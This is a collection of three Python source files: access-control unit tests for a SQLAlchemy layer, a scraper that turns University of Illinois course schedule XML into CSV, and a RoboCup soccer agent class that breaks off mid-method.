self.session.add_all(low_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
object = self.session.query(ExemplaryModel).first()
self.session.delete(object)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
self.assertEqual(self.session.query(ExemplaryModel).all(), low_level_objects[1:])
ACL.unset_user()
# WHERE
def test_filter(self):
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
low_level_objects = [
ExemplaryModel(id=5, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=6, string_field='some_string', integer_field=randrange(100000))
]
self.session.add_all(low_level_objects)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(ExemplaryModel).filter(ExemplaryModel.id > 2).all(), low_level_objects)
ACL.unset_user()
# JOIN on tables created by users at the same access level
def test_same_lvl_join(self):
ACL.set_user(ACL.Users.get(username='chair1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='chair2'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # decoy record
]
self.session.add_all(orders)
self.session.commit()
join = [(customers[0], orders[0]), (customers[0], orders[1]), (customers[1], orders[2]), (customers[1], orders[3])]
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='chair1'))
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
# JOIN with a table created by a lower-level user
def test_low_lvl_join(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # decoy record
]
self.session.add_all(orders)
self.session.commit()
ACL.set_user(ACL.Users.get(username='account'))
join = [(customers[0], orders[0]), (customers[0], orders[1]), (customers[1], orders[2]), (customers[1], orders[3])]
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, join)
ACL.unset_user()
# JOIN with a table created by a higher-level user
def test_high_lvl_join(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998') # decoy record
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.name,
OrdersModel.id, OrdersModel.order_date).join(OrdersModel).all()
self.assertEqual(result, [])
ACL.unset_user()
# JOIN with a table created by a higher-level user, but with records added by the lower-level user
def test_high_lvl_join_added_records(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
client = CustomersModel(id=3, name='James Bond', phone_number='007')
self.session.add(client)
self.session.commit()
result = self.session.query(CustomersModel, OrdersModel).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).all()
self.assertEqual(result, [(client, orders[4])])
ACL.unset_user()
# UPDATE on a record at a higher access level
def test_high_lvl_update(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
ACL.set_user(ACL.Users.get(username='account'))
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# UPDATE on a record at a lower access level
def test_low_lvl_update(self):
ACL.set_user(ACL.Users.get(username='accountjun'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# UPDATE on a record at the same access level, created by another user
def test_same_lvl_update(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.session.query(CustomersModel).filter(CustomersModel.id == 1).update({'name': 'Smill With'})
self.session.commit()
result = self.session.query(CustomersModel).first()
self.assertEqual(result.name, 'Smill With')
ACL.unset_user()
# COUNT on records at a higher access level
def test_high_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='accountint'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountint'))
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 2)
ACL.unset_user()
# COUNT on records at a lower access level
def test_low_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='accountint'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 5)
ACL.unset_user()
# COUNT on records at the same access level
def test_same_lvl_aggr(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=3, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(func.count(OrdersModel.id)).scalar(), 5)
ACL.unset_user()
# GROUP BY on records at a higher access level
def test_high_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='account'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='accountjun'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).group_by(CustomersModel.id).all()
self.assertEqual(result, [])
ACL.unset_user()
# GROUP BY on records at a lower access level
def test_low_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='accountjun'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='account'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)) \
.join(OrdersModel, CustomersModel.id == OrdersModel.customer_id) \
.group_by(CustomersModel.id).all()
self.assertEqual(result, [(1, 2), (2, 3)])
ACL.unset_user()
# GROUP BY on records at the same access level
def test_same_lvl_groupby(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998'),
OrdersModel(id=5, customer_id=2, order_date='08-28-1998')
]
self.session.add_all(orders)
self.session.commit()
result = self.session.query(CustomersModel.id, func.count(CustomersModel.id)).join(OrdersModel,
CustomersModel.id==OrdersModel.customer_id).group_by(CustomersModel.id).all()
self.assertEqual(result, [(1, 2), (2, 3)])
ACL.unset_user()
# SUBQUERY in a JOIN; the higher-level user should see the later dates added by the lower-level user
def test_low_lvl_subquery(self):
ACL.set_user(ACL.Users.get(username='trads'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=5, customer_id=1, order_date='10-31-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
subquery = self.session.query(OrdersModel.customer_id, func.max(OrdersModel.order_date).label('latest_order')
).group_by(OrdersModel.customer_id).subquery()
query = self.session.query(CustomersModel.name, subquery.c.latest_order).join(subquery,
CustomersModel.id == subquery.c.customer_id).all()
self.assertEqual(query, [('Will Smith', '10-31-1998'), ('Tom Hanks', '10-15-1998')])
ACL.unset_user()
# SUBQUERY in a JOIN; the user should see the later orders
def test_same_lvl_subquery(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
self.session.add_all(customers)
self.session.commit()
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=5, customer_id=1, order_date='10-31-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
subquery = self.session.query(OrdersModel.customer_id, func.max(OrdersModel.order_date).label('latest_order')
).group_by(OrdersModel.customer_id).subquery()
query = self.session.query(CustomersModel.name, subquery.c.latest_order).join(subquery,
CustomersModel.id == subquery.c.customer_id).all()
self.assertEqual(query, [('Will Smith', '10-31-1998'), ('Tom Hanks', '10-15-1998')])
ACL.unset_user()
# HAVING where the user fails because they have no access to that customer
# (we ask for the ids of customers with more than 2 orders)
def test_high_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [])
ACL.unset_user()
# HAVING where the user succeeds because they have a higher access level
# (we ask for the ids of customers with more than 2 orders)
def test_low_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [(2, 4)])
ACL.unset_user()
# HAVING where the user succeeds because they have the same access level
# (we ask for the ids of customers with more than 2 orders)
def test_same_lvl_having(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
orders = [
OrdersModel(id=1, customer_id=1, order_date='07-31-1998'),
OrdersModel(id=2, customer_id=1, order_date='08-31-1998'),
OrdersModel(id=3, customer_id=2, order_date='07-15-1998'),
OrdersModel(id=4, customer_id=2, order_date='08-15-1998')
]
self.session.add_all(orders)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun2'))
orders = [
OrdersModel(id=5, customer_id=2, order_date='09-15-1998'),
OrdersModel(id=6, customer_id=2, order_date='10-15-1998'),
]
self.session.add_all(orders)
self.session.commit()
query = self.session.query(OrdersModel.customer_id, func.count(OrdersModel.customer_id)).\
group_by(OrdersModel.customer_id).having(func.count(OrdersModel.customer_id) > 2).all()
self.assertEqual(query, [(2, 4)])
ACL.unset_user()
# double JOIN - checking the average number of boxes ordered by a given customer
def test_join2(self):
ACL.set_user(ACL.Users.get(username='tradsjun1'))
customers = [
CustomersModel(id=1, name='Will Smith', phone_number='111-222-333'),
CustomersModel(id=2, name='Tom Hanks', phone_number='999-888-777')
]
orders = [
OrdersModel(id=1, customer_id=1, order_date='2021-01-01'),
OrdersModel(id=2, customer_id=2, order_date='2021-01-01'),
OrdersModel(id=3, customer_id=1, order_date='2021-01-01')
]
articles = [
ArticlesModel(id=1, order_id=1, box_id=1, quantity=10),
ArticlesModel(id=2, order_id=1, box_id=4, quantity=5),
ArticlesModel(id=3, order_id=2, box_id=2, quantity=20),
ArticlesModel(id=4, order_id=3, box_id=2, quantity=12),
]
self.session.add_all(customers)
self.session.commit()
self.session.add_all(orders)
self.session.commit()
self.session.add_all(articles)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
customers = [
CustomersModel(id=3, name='Mel Gibson', phone_number='444-555-666')
]
orders = [
OrdersModel(id=4, customer_id=3, order_date='2021-01-01'),
OrdersModel(id=5, customer_id=3, order_date='2021-01-01'),
OrdersModel(id=6, customer_id=3, order_date='2021-01-01'),
OrdersModel(id=7, customer_id=2, order_date='2021-01-01')
]
articles = [
ArticlesModel(id=5, order_id=4, box_id=1, quantity=10),
ArticlesModel(id=6, order_id=5, box_id=4, quantity=5),
ArticlesModel(id=7, order_id=6, box_id=2, quantity=15),
ArticlesModel(id=8, order_id=7, box_id=2, quantity=100),
]
self.session.add_all(customers)
self.session.commit()
self.session.add_all(orders)
self.session.commit()
self.session.add_all(articles)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
result = self.session.query(CustomersModel.name, func.avg(ArticlesModel.quantity)).\
join(OrdersModel, CustomersModel.id == OrdersModel.customer_id).\
join(ArticlesModel, OrdersModel.id == ArticlesModel.order_id).\
group_by(CustomersModel.id).all()
self.assertEqual(result, [('Will Smith', 9), ('Tom Hanks', 20)])
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
result = self.session.query(CustomersModel.name, func.avg(ArticlesModel.quantity)).\
join(OrdersModel, CustomersModel.id == OrdersModel.customer_id).\
join(ArticlesModel, OrdersModel.id == ArticlesModel.order_id).\
group_by(CustomersModel.id).all()
self.assertEqual(result, [('Will Smith', 9), ('Tom Hanks', 60), ('Mel Gibson', 10)])
ACL.unset_user()
### DOCKER AND POSTGRES IMAGE REQUIRED ###
# for more see notes above setup.PostgresSetupMixin class
# if you want to skip this test case, simply comment it out (yes, there is probably a better way of doing this ;) )
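# A less manual alternative (just a sketch, using the same class as in the
# string below) would be to keep the class active and decorate it instead:
#
#   @unittest.skip("requires Docker and a Postgres image")
#   class StandardConcurrentQueriesTestCase(PostgresSetupMixin, unittest.TestCase):
#       ...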
"""
class StandardConcurrentQueriesTestCase(PostgresSetupMixin, unittest.TestCase):
def test_parallel_selects(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
import threading, logging, random
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.DEBUG,
datefmt="%H:%M:%S")
def thread_function(id):
logging.debug('Thread {0} started..'.format(id))
for _ in range(3):
ACL.set_user(ACL.Users.get(username='admin1'))
objects = self.session.query(ExemplaryModel).all()
logging.debug('thread = {0}, objects = {1}'.format(id, objects))
self.assertEqual(root_level_objects, objects)
ACL.unset_user()
logging.debug('Thread {0} finished..'.format(id))
threads = []
for i in range(5):
thr = threading.Thread(target=thread_function, args=(i,))
threads.append(thr)
thr.start()
for thr in threads:
thr.join()
"""
if __name__ == '__main__':
unittest.main()
|
cis_scraper.py
|
from lxml import etree as ET
from urllib.request import urlopen
from time import sleep
import re
import csv
from threading import Thread
# ---------------------- Fields --------------------------------------
fields = ["year",
"term",
"college",
"subject",
"subject_name",
"number",
"name",
"description",
"credit_hours",
"gen_ed",
"gen_ed_name",
"crn",
"section",
"section_info",
"section_notes",
"section_attributes",
"section_capp_area",
"section_co_request",
"section_special_approval",
"part_of_term",
"start_date",
"end_date",
"meeting",
"type",
"type_name",
"start_time",
"end_time",
"days",
"room",
"building",
"instructor"]
# ---------------------- Helper functions -----------------------------
def url_open(url):
retrycount = 0
s = None
while s is None:
try:
s = urlopen(url, timeout=50)
except:
print(url)
retrycount += 1
if retrycount > 6:
raise
sleep(2)
return s
def text_or_none(xml, find, pattern=None, attrib=None):
if xml.find(find) is not None:
text = xml.find(find)
if attrib is not None:
text = text.attrib[attrib]
else:
text = text.text
if pattern is not None:
match = re.match(pattern, text)
if match is not None:
return match.group(1) or None
return None
return text or None
return None
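# Usage sketch (hypothetical XML element): given <section><sectionNumber>AL1</sectionNumber></section>
#   text_or_none(section, "sectionNumber")          -> "AL1"
#   text_or_none(meeting, "type", attrib="code")    -> the ``code`` attribute of <type>
#   text_or_none(info, "label", pattern=r"(\w+)")   -> first word of the label text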
def build_url(*args):
url = "https://courses.illinois.edu/cisapp/explorer/schedule"
for arg in args:
url += "/" + str(arg)
return url + ".xml"
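# For example (argument values are illustrative only):
#   build_url(2020, "fall", "CS", 225)
#   -> "https://courses.illinois.edu/cisapp/explorer/schedule/2020/fall/CS/225.xml"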
# ---------------------- Get Semester Data -----------------------------
def write_semester_csv(year, term):
row = {
"year": str(year),
"term": term.capitalize()
}
writer = csv.DictWriter(open("data/raw/{}-{}.csv".format(row["year"],row["term"]), "w+", newline='', encoding='utf-8'), fieldnames=fields)
writer.writeheader()
url = build_url(row["year"], row["term"].lower())
for subject in ET.parse(url_open(url)).iter("subject"):
row["subject"] = subject.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"])
subject_info = ET.parse(url_open(url))
row["college"] = text_or_none(subject_info, "collegeCode")
row["subject_name"] = text_or_none(subject_info, "label")
print("Getting {} {} {}...".format(row["year"], row["term"], row["subject"]))
for course in subject_info.iter("course"):
row["number"] = course.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"], row["number"])
course_info = ET.parse(url_open(url))
row["name"] = text_or_none(course_info, "label")
row["description"] = text_or_none(course_info, "description")
row["credit_hours"] = text_or_none(course_info, "creditHours")
row["section_attributes"] = text_or_none(course_info, "sectionDegreeAttributes")
for section in course_info.iter("section"):
row["crn"] = section.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"], row["number"], row["crn"])
section_info = ET.parse(url_open(url))
row["section"] = text_or_none(section_info, "sectionNumber")
row["section_info"] = text_or_none(section_info, "sectionText")
row["section_notes"] = text_or_none(section_info, "sectionNotes")
row["section_capp_area"] = text_or_none(section_info, "sectionCappArea")
row["section_attributes"] = row["section_attributes"] or text_or_none(section_info, "sectionDegreeAttributes")
row["section_co_request"] = text_or_none(section_info, "sectionCoRequest")
row["section_special_approval"] = text_or_none(section_info, "specialApproval")
row["part_of_term"] = text_or_none(section_info, "partOfTerm")
row["start_date"] = text_or_none(section_info, "startDate")
row["end_date"] = text_or_none(section_info, "endDate")
for meeting in section_info.iter("meeting"):
row["meeting"] = meeting.attrib["id"]
row["type"] = text_or_none(meeting, "type", attrib="code")
row["type_name"] = text_or_none(meeting, "type")
row["days"] = text_or_none(meeting, "daysOfTheWeek")
row["room"] = text_or_none(meeting, "roomNumber")
row["start_time"] = text_or_none(meeting, "start")
row["end_time"] = text_or_none(meeting, "end")
row["building"] = text_or_none(meeting, "buildingName")
instructors = meeting.iter("instructor")
if next(meeting.iter("instructor"),None) is None:
instructors = [None]
for instructor in instructors:
row["instructor"] = instructor if instructor is None else instructor.text
categories = course_info.find("genEdCategories")
if categories is not None:
for cat in categories.iter("category"):
for genEd in cat.find("{http://rest.cis.illinois.edu}genEdAttributes").iter("genEdAttribute"):
row["gen_ed"] = genEd.attrib["code"]
row["gen_ed_name"] = genEd.text
writer.writerow(row)
else:
row["gen_ed"] = None
writer.writerow(row)
# Get past semesters
if __name__ == "__main__":
threads = []
for year in ET.parse(url_open("https://courses.illinois.edu/cisapp/explorer/schedule.xml")).iter("calendarYear"):
for term in ET.parse(url_open(year.attrib["href"])).iter("term"):
thread = Thread(target=write_semester_csv, args=(year.text, term.text[:-5]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
|
agent.py
|
#!/usr/bin/env python
import threading
import time
import random
import sock
import sp_exceptions
import handler
from world_model import WorldModel
class Agent:
def __init__(self):
# whether we're connected to a server yet or not
self.__connected = False
# set all variables and important objects to appropriate values for
# pre-connect state.
# the socket used to communicate with the server
self.__sock = None
# models and the message handler for parsing and storing information
self.wm = None
self.msg_handler = None
# parse thread and control variable
self.__parsing = False
self.__msg_thread = None
self.__thinking = False # think thread and control variable
self.__think_thread = None
# whether we should run the think method
self.__should_think_on_data = False
# whether we should send commands
self.__send_commands = False
# adding goal post markers
self.enemy_goal_pos = None
self.own_goal_pos = None
def connect(self, host, port, teamname, version=11):
"""
Gives us a connection to the server as one player on a team. This
immediately connects the agent to the server and starts receiving and
parsing the information it sends.
"""
# if already connected, raise an error since user may have wanted to
# connect again to a different server.
if self.__connected:
msg = "Cannot connect while already connected, disconnect first."
raise sp_exceptions.AgentConnectionStateError(msg)
# the pipe through which all of our communication takes place
self.__sock = sock.Socket(host, port)
# our models of the world and our body
self.wm = WorldModel(handler.ActionHandler(self.__sock))
# set the team name of the world model to the given name
self.wm.teamname = teamname
# handles all messages received from the server
self.msg_handler = handler.MessageHandler(self.wm)
# set up our threaded message receiving system
self.__parsing = True # tell thread that we're currently running
self.__msg_thread = threading.Thread(target=self.__message_loop,
name="message_loop")
self.__msg_thread.daemon = True # dies when parent thread dies
# start processing received messages. this will catch the initial server
# response and all subsequent communication.
self.__msg_thread.start()
# send the init message and allow the message handler to handle further
# responses.
init_address = self.__sock.address
init_msg = "(init %s (version %d))"
self.__sock.send(init_msg % (teamname, version))
# wait until the socket receives a response from the server and gets its
# assigned port.
while self.__sock.address == init_address:
time.sleep(0.0001)
# create our thinking thread. this will perform the actions necessary
# to play a game of robo-soccer.
self.__thinking = False
self.__think_thread = threading.Thread(target=self.__think_loop,
name="think_loop")
self.__think_thread.daemon = True
# set connected state. done last to prevent state inconsistency if
# something goes wrong beforehand.
self.__connected = True
def play(self):
"""
Kicks off the thread that does the agent's thinking, allowing it to play
during the game. Throws an exception if called while the agent is
already playing.
"""
# ensure we're connected before doing anything
if not self.__connected:
msg = "Must be connected to a server to begin play."
raise sp_exceptions.AgentConnectionStateError(msg)
# throw exception if called while thread is already running
if self.__thinking:
raise sp_exceptions.AgentAlreadyPlayingError(
"Agent is already playing.")
# run the method that sets up the agent's persistent variables
self.setup_environment()
# tell the thread that it should be running, then start it
self.__thinking = True
self.__should_think_on_data = True
self.__think_thread.start()
def disconnect(self):
"""
Tell the loop threads to stop and signal the server that we're
disconnecting, then join the loop threads and destroy all our inner
methods.
Since the message loop thread can conceivably block indefinitely while
waiting for the server to respond, we only allow it (and the think loop
for good measure) a short time to finish before simply giving up.
Once an agent has been disconnected, it is 'dead' and cannot be used
again. All of its methods get replaced by a method that raises an
exception every time it is called.
"""
# don't do anything if not connected
if not self.__connected:
return
# tell the loops to terminate
self.__parsing = False
self.__thinking = False
# tell the server that we're quitting
self.__sock.send("(bye)")
# tell our threads to join, but only wait briefly for them to do so.
# don't join them if they haven't been started (this can happen if
# disconnect is called very quickly after connect).
if self.__msg_thread.is_alive():
self.__msg_thread.join(0.01)
if self.__think_thread.is_alive():
self.__think_thread.join(0.01)
# reset all standard variables in this object. self.__connected gets
# reset here, along with all other non-user defined internal variables.
Agent.__init__(self)
def __message_loop(self):
"""
Handles messages received from the server.
This SHOULD NOT be called externally, since it's used as a threaded loop
internally by this object. Calling it externally is a BAD THING!
"""
# loop until we're told to stop
while self.__parsing:
# receive message data from the server and pass it along to the
# world model as-is. the world model parses it and stores it within
# itself for perusal at our leisure.
raw_msg = self.__sock.recv()
msg_type = self.msg_handler.handle_message(raw_msg)
# we send commands all at once every cycle, ie. whenever a
# 'sense_body' command is received
if msg_type == handler.ActionHandler.CommandType.SENSE_BODY:
self.__send_commands = True
# flag new data as needing the think loop's attention
